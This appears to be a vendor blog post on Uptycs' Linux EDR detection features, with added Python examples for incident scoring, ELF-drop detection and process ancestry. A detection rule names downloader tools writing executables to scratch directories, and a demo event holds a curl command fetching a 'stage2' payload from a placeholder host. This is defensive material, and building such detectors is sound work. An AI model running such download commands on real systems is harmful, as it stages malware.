Uptycs Blog


Uptycs EDR for Linux: Detection and visibility all the way through

Although Linux server endpoints make up roughly 90% of cloud workloads and the majority of on-premises enterprise workloads, they usually receive far less attention than end-user endpoints. Most EDR products are built around end users and do not meet the distinct requirements of production Linux servers, such as near-100% uptime and low resource consumption.

Uptycs’ Linux EDR functionality provides a performant solution that’s been deployed on some of the world’s largest Linux server fleets, including a single tenant deployment that exceeds 200,000 servers.

The solution comes pre-configured with hundreds of detection rules mapped to the MITRE ATT&CK matrix (Uptycs is participating in this year’s MITRE ATT&CK evaluation, which is focusing on the activity of FIN7 and Carbanak). The MITRE ATT&CK mapping simplifies incident context for SOC analysts. In addition, the Uptycs threat research team provides daily updates for detection rules and intelligence focused on Linux threats.

In this post I’ll explore Uptycs’ Linux EDR capabilities and look at a handful of specific EDR features within Uptycs that help SOC teams with detection and investigation.


Designed to detect advanced attacks

Uptycs uses a multi-layered detection approach. Uptycs’ EDR functionality not only detects the attack but also prioritizes incidents based on a custom composite score and severity. This reduces alert fatigue and allows analysts to focus on critical incidents first. Uptycs uses two components to achieve this: a rule engine and a correlation engine.

Rule engine

The Uptycs rule engine processes events in real-time and works at significant scale. It applies behavioral rules and intelligence to detect suspicious/malicious events, and uses the MITRE ATT&CK framework to label, classify, and score raw events. Based on rule configuration, the engine can generate alerts or keep a labeled event for additional incident context.

Correlation engine

Uptycs’ correlation engine builds an incident by correlating the activity that belongs to an alert. The rule engine invokes the correlation engine whenever it detects something suspicious. The correlation engine then addresses three problems SOC analysts run into constantly: alert grouping, incident prioritization, and correlation of lateral movement.

Alert grouping

All of the alerts that belong to the same incident are grouped together to reduce alert fatigue and provide better context of the incident to the analyst. You can see this in action in figures 1 and 2 (below) where related alerts and events are grouped together as “signals” that comprise a detection.

Incident prioritization

The Uptycs correlation engine uses a score mechanism to prioritize incidents (see figures 1 and 2). This lets SOC analysts focus first on critical incidents that require immediate attention. Incident prioritization reduces the time and energy needed to effectively investigate high-severity incidents.


Figure 1: Alerts and labeled events related to an incident are grouped together as signals within Uptycs’ EDR capabilities. The correlation engine creates a threat score for prioritizing response. The grouping and scoring reduce alert fatigue and give SOC analysts important context for incident investigation.


Figure 2: This process graph related to an incident provides visibility inside an attack. The graph offers insights into process executions, command lines, sockets, files, and user accounts.
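To make the grouping and scoring idea concrete, here is an added example (my own illustration, not Uptycs code): labeled events that share a host and a process-tree root are collapsed into one incident, and each incident gets a composite score. The scoring formula, severity weights, field names, and sample events are all assumptions constructed for the demo; Uptycs' actual scoring is not published on this page.

```python
"""Illustrative alert grouping and incident scoring (added example, not Uptycs code)."""
from collections import defaultdict

# Assumed severity weights for the demo; not Uptycs' scale.
SEVERITY_WEIGHT = {"low": 1, "medium": 3, "high": 6, "critical": 10}

# Constructed sample events. `alert` is True for events the rule engine alerted on,
# False for events it only labeled and kept for context. `root_pid` stands in for
# the root of the process tree the event came from (its ancestry root).
SAMPLE_EVENTS = [
    {"host": "web-01", "root_pid": 4010, "technique": "T1059.004", "tactic": "execution",            "severity": "medium",   "alert": True},
    {"host": "web-01", "root_pid": 4010, "technique": "T1105",     "tactic": "command-and-control",  "severity": "high",     "alert": True},
    {"host": "web-01", "root_pid": 4010, "technique": "T1083",     "tactic": "discovery",            "severity": "low",      "alert": False},
    {"host": "web-01", "root_pid": 4010, "technique": "T1548.001", "tactic": "privilege-escalation", "severity": "critical", "alert": True},
    {"host": "db-07",  "root_pid": 912,  "technique": "T1083",     "tactic": "discovery",            "severity": "low",      "alert": True},
    {"host": "db-07",  "root_pid": 912,  "technique": "T1083",     "tactic": "discovery",            "severity": "low",      "alert": True},
]


def group_incidents(events):
    """Group events by (host, root_pid): one incident per process tree per host.

    Every event in the group becomes a 'signal' of the incident; alerts are
    counted separately so analysts can see how many fired versus how many were
    kept only for context.
    """
    incidents = defaultdict(lambda: {"signals": [], "alerts": 0})
    for ev in events:
        inc = incidents[(ev["host"], ev["root_pid"])]
        inc["signals"].append(ev)
        if ev["alert"]:
            inc["alerts"] += 1
    return dict(incidents)


def score_incident(incident):
    """Composite score (assumed formula): weight of the strongest alert, plus
    2 points for every additional ATT&CK tactic seen in the incident.

    The breadth bonus is the point: four low/medium signals spanning execution,
    C2, discovery and privilege escalation look like an intrusion in progress,
    while two identical discovery hits on one host do not.
    Labeled-but-unalerted events add to breadth but not to the base score.
    """
    alerts = [s for s in incident["signals"] if s["alert"]]
    base = max((SEVERITY_WEIGHT[s["severity"]] for s in alerts), default=0)
    tactics = {s["tactic"] for s in incident["signals"]}
    breadth_bonus = 2 * (len(tactics) - 1) if tactics else 0
    return base + breadth_bonus


def prioritize(events):
    """Return incidents sorted highest score first, as plain dicts."""
    ranked = []
    for (host, root_pid), inc in group_incidents(events).items():
        ranked.append({
            "host": host,
            "root_pid": root_pid,
            "score": score_incident(inc),
            "alerts": inc["alerts"],
            "signals": len(inc["signals"]),
            "tactics": sorted({s["tactic"] for s in inc["signals"]}),
        })
    return sorted(ranked, key=lambda r: r["score"], reverse=True)


if __name__ == "__main__":
    for inc in prioritize(SAMPLE_EVENTS):
        print(f"{inc['host']:8} score={inc['score']:3} alerts={inc['alerts']} "
              f"signals={inc['signals']} tactics={','.join(inc['tactics'])}")
```

Running it yields two incidents instead of five separate alerts: web-01 scores 16 (a critical alert plus four distinct tactics) and db-07 scores 1, which is the ordering an analyst wants to see first.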

Lateral movement correlation

Advanced attacks don't stop at a single machine. Attackers move laterally within an organization’s systems to look for high-value targets. Uptycs' correlation engine can connect this lateral movement as the attack progresses. For example, in figure 3 below, a Python process runs a script named '/tmp/HJfbsd.py' that authenticates to a Windows machine with an NTLM hash (a pass-the-hash login) and executes cmd.exe there. SOC analysts can use this information to quickly take action and safeguard the organization’s resources. Lateral movement correlation also provides insight into attacker methodology and intent.


Figure 3: Lateral movement correlation within Uptycs’ EDR functionality lets SOC analysts quickly take action to safeguard their organization’s systems and resources.

Native integration with threat intelligence

The Uptycs threat research team provides daily intelligence on Linux attacks. A dedicated threat intelligence dashboard gives SOC teams an at-a-glance view of the threat indicators added and expired each day, the latest malware news, a breakdown of threat indicators by category, and related alerts (see figure 4, below).


Figure 4: The Uptycs threat intelligence dashboard brings together threat indicators, malware news, alerts, and more.

Six specific Uptycs EDR features that solve real-life security problems

In addition to the capabilities already outlined, Uptycs offers a number of specific EDR features that can help SOC teams with detection and investigation.

Process code injection and process hollowing detection

Uptycs’ EDR functionality detects code injection natively within osquery itself, covering both ptrace-based injection (the ptrace syscall) and library injection via the LD_PRELOAD environment variable.

File type identification based on the magic header of the file

By default, Uptycs’ EDR configuration records the first 10 bytes of a file as a hex string. This is useful in investigation and threat hunting, and in detection rules that identify malware by file type rather than by extension. For example: if the curl utility drops an ELF file (magic bytes 7f454c46, i.e. "\x7fELF") in the /tmp directory, that is flagged as suspicious activity (see figure 5, below).


Figure 5: Detection of an elf executable using the magic header of the file.
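The magic-header check described above, as an added example (my own code, not Uptycs'): it classifies a file from the hex string of its leading bytes and applies the "downloader drops an ELF into a scratch directory" rule to a few constructed file events. It goes slightly beyond the text by also reading the ELF class and endianness bytes, which fit inside the 10-byte window. The event field names (`process`, `path`, `header_hex`), the downloader list, and the sample events are assumptions for the demo.

```python
"""Magic-header file typing and a drop-detection rule (added example, not Uptycs code)."""
import os

# Leading bytes (hex) -> type label. ELF is 7f 45 4c 46 ("\x7fELF"); the rest are
# other well-known signatures added for breadth.
MAGIC_PREFIXES = [
    ("7f454c46", "elf"),
    ("4d5a", "pe"),        # "MZ": DOS/PE header
    ("2321", "script"),    # "#!": shebang
    ("1f8b", "gzip"),
    ("504b0304", "zip"),
]

# Assumed: processes whose writes of native executables into scratch dirs are suspect.
DOWNLOADERS = {"curl", "wget", "python", "python3"}
SCRATCH_DIRS = ("/tmp", "/var/tmp", "/dev/shm")


def _normalize(header_hex):
    return header_hex.lower().replace(" ", "")


def file_type_from_hex(header_hex):
    """Return a type label for the file's leading bytes, or 'unknown'."""
    h = _normalize(header_hex)
    for prefix, label in MAGIC_PREFIXES:
        if h.startswith(prefix):
            return label
    return "unknown"


def describe(header_hex):
    """Like file_type_from_hex, but for ELF also decodes EI_CLASS (byte 4) and
    EI_DATA (byte 5) from the ELF identification header, e.g. 'elf64-le'."""
    h = _normalize(header_hex)
    kind = file_type_from_hex(h)
    if kind == "elf" and len(h) >= 12:
        cls = {"01": "32", "02": "64"}.get(h[8:10], "?")
        endian = {"01": "le", "02": "be"}.get(h[10:12], "?")
        return f"elf{cls}-{endian}"
    return kind


def _in_scratch_dir(path):
    return any(path == d or path.startswith(d + "/") for d in SCRATCH_DIRS)


def is_suspicious_drop(event):
    """Rule: a downloader wrote a native ELF executable into a scratch directory.
    Extension is ignored on purpose; only the magic bytes decide the type."""
    return (
        file_type_from_hex(event["header_hex"]) == "elf"
        and _in_scratch_dir(event["path"])
        and os.path.basename(event["process"]) in DOWNLOADERS
    )


def run_rule(events):
    """Return the paths of every event the rule flags."""
    return [ev["path"] for ev in events if is_suspicious_drop(ev)]


# Constructed sample file events; header_hex is the first 10 bytes of each file.
SAMPLE_EVENTS = [
    # curl drops a 64-bit little-endian ELF named like a kernel thread into /tmp
    {"process": "/usr/bin/curl", "path": "/tmp/.x/kthreadd", "header_hex": "7f454c46020101000000"},
    # curl fetches a shell script: a script, not an ELF, so the rule stays quiet
    {"process": "/usr/bin/curl", "path": "/tmp/setup.sh", "header_hex": "23212f62696e2f73680a"},
    # a compiler writing an ELF into a home directory is normal build activity
    {"process": "/usr/bin/gcc", "path": "/home/dev/a.out", "header_hex": "7f454c46020101000000"},
    # wget writes a 32-bit ELF into /dev/shm, a classic fileless-ish staging spot
    {"process": "/usr/bin/wget", "path": "/dev/shm/.p", "header_hex": "7f454c46010101000000"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(f"{ev['path']:20} {describe(ev['header_hex']):10} flagged={is_suspicious_drop(ev)}")
```

Matching on the magic bytes rather than the filename is what catches the first sample: the dropped binary is named kthreadd and has no extension, yet its header says ELF.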

Parent processes history in every event

Every event from the process, file, and socket tables carries an ancestor_list, the history of all parent processes leading to that event. This is extremely useful in manual investigations. The lineage stays attached to the event for many days, because each child process inherits the ancestor_list of its parent at creation time, even if that child is created long after earlier ancestors have exited.

For example: suppose a Python process downloads and runs a remote admin tool and then terminates itself. Seven days later the remote admin tool uses the curl utility to download additional tools. The process event for curl will list Python, Python's own ancestors, and the remote admin tool in its ancestor_list.
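The inheritance rule described above, as an added example (my own illustration, not Uptycs code): a tracker stamps each process with the ancestor chain captured when it starts, so an event emitted later still carries the full lineage even though an intermediate parent has exited. The process names, PIDs, event shape, and the timeline below are constructed for the demo.

```python
"""Ancestor lists that survive parent exit (added example, not Uptycs code)."""
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    name: str
    ancestor_list: list  # [(pid, name), ...] from the root down to the immediate parent


class AncestryTracker:
    def __init__(self):
        self.live = {}      # pid -> Proc for processes that are still running
        self.lineage = {}   # pid -> Proc retained after exit, so a late-arriving
                            # child event can still inherit (retention bound omitted)

    def start(self, pid, ppid, name):
        """Record a new process. Its ancestor_list is the parent's list plus the
        parent itself, copied at creation time; it is never recomputed later."""
        parent = self.live.get(ppid) or self.lineage.get(ppid)
        ancestors = [] if parent is None else parent.ancestor_list + [(parent.pid, parent.name)]
        proc = Proc(pid, name, ancestors)
        self.live[pid] = proc
        self.lineage[pid] = proc
        return proc

    def exit(self, pid):
        """Process ended. Children keep the copy they already hold."""
        self.live.pop(pid, None)

    def event(self, pid, kind, **fields):
        """Emit an event for a live process, carrying its ancestor_list."""
        proc = self.live[pid]
        return {"pid": pid, "process": proc.name, "type": kind,
                "ancestor_list": list(proc.ancestor_list), **fields}


def has_ancestor(event, name):
    """Hunting helper: did any ancestor of this event's process have this name?"""
    return any(n == name for _, n in event["ancestor_list"])


def demo_timeline():
    """Constructed timeline from the text: python3 starts a remote admin tool
    and exits; much later the tool runs curl. Returns curl's process event."""
    t = AncestryTracker()
    t.start(1, 0, "systemd")
    t.start(1200, 1, "sshd")
    t.start(1300, 1200, "bash")
    t.start(1400, 1300, "python3")
    t.start(1500, 1400, "rat")          # the remote admin tool, started by python3
    t.exit(1400)                        # python3 terminates itself
    # ... seven days pass; rat is still running ...
    t.start(1600, 1500, "curl")
    return t.event(1600, "process", cmdline="curl -sO http://example.invalid/stage2")


if __name__ == "__main__":
    ev = demo_timeline()
    chain = " -> ".join(f"{n}({p})" for p, n in ev["ancestor_list"])
    print(f"{ev['process']}({ev['pid']}) ancestors: {chain}")
    print("spawned under python3:", has_ancestor(ev, "python3"))
```

The important property is that the list is copied forward at each fork, not looked up from the live process table when the event fires: by the time curl runs, python3 has been gone for a week, and a live-table lookup would have reparented the chain to init and lost the Python origin.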

YARA memory and file scanning

By default, the memory of every process is scanned with YARA rules on a periodic basis defined in the configuration. In addition to the automatic scan, an on-demand memory scan can be launched to search for in-memory artifacts across the entire fleet. YARA file scans cover every path in the FIM (file integrity monitoring) configuration.

File and memory carving capabilities

The EDR functionality in Uptycs includes real-time file and memory carving that an administrator can enable or disable for specific users. Carved files and memory regions are very useful for offline analysis of malicious code.

Heavy customization is available

Pretty much everything in Uptycs’ EDR capabilities can be customized, from dashboards to detection rules. Custom detection rules and intelligence can be added into Uptycs with a few simple clicks.

Conclusion

Uptycs’ EDR capabilities provide comprehensive detection for production Linux servers, both on-premises and in the cloud. Combined with Uptycs’ investigation capabilities—including the ability to pivot on data points found in the detection, as well as real-time and historical queries—Uptycs gives SOC teams a robust platform for detection and response.